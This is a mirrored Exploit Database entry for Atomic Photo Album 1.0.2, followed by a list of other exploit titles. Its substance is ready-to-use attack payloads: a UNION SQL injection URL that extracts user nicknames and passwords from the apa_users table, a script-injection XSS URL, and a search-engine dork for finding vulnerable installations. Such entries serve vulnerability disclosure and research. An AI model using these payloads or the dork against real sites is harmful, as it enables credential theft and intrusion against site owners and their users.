Atomic Photo Album 1.0.2 – Multiple Vulnerabilities

Exploit Database
13 阅读

作者： sh00t0ut

日期： 2010-08-26
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/14801/

[~] Atomic Photo Album 1.0.2 (SQL/XSS) Multiple Remote Vulnerabilities
[~] http://www.exploit-db.com/exploits/6572/
[~] Found by sh00t0ut
[~] Down: http://www.c-point.com/free_php_scripts/photo_album.php
[~] Expl SQL: 
http://[victim]/photo.php?apa_album_ID=2&apa_photo_ID=-9999 union all select 1,concat(0x3a,nickname,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from apa_users--
[~] Expl XSS: 
http://[victim]/photo.php?apa_album_ID=2&apa_photo_ID=<script>alert(1)</script>

[~] Dork: "Powered by Atomic Photo Album" inurl:"photo.php?apa_album_ID="

last Exploits
Atomic Photo Album 1.0.2 – Multiple Vulnerabilities的更多信息

WebTitan 4.01 (Build 68) – Multiple Vulnerabilities：
Cybrotech CyBroHttpServer 1.0.3 – Cross-Site Scripting：
Oracle Demantra 12.2.1 – SQL Injection：
iTech Travel Script 9.49 – SQL Injection：
AiCart 2.0 – Multiple Vulnerabilities：
Lot Reservation Management System – Unauthenticated File Upload and Remote Code Execution：
Bus Pass Management System 1.0 – ‘viewid’ SQL Injection：
InfraPower PPS-02-S Q213V1 – Multiple Cross-Site Scripting Vulnerabilities：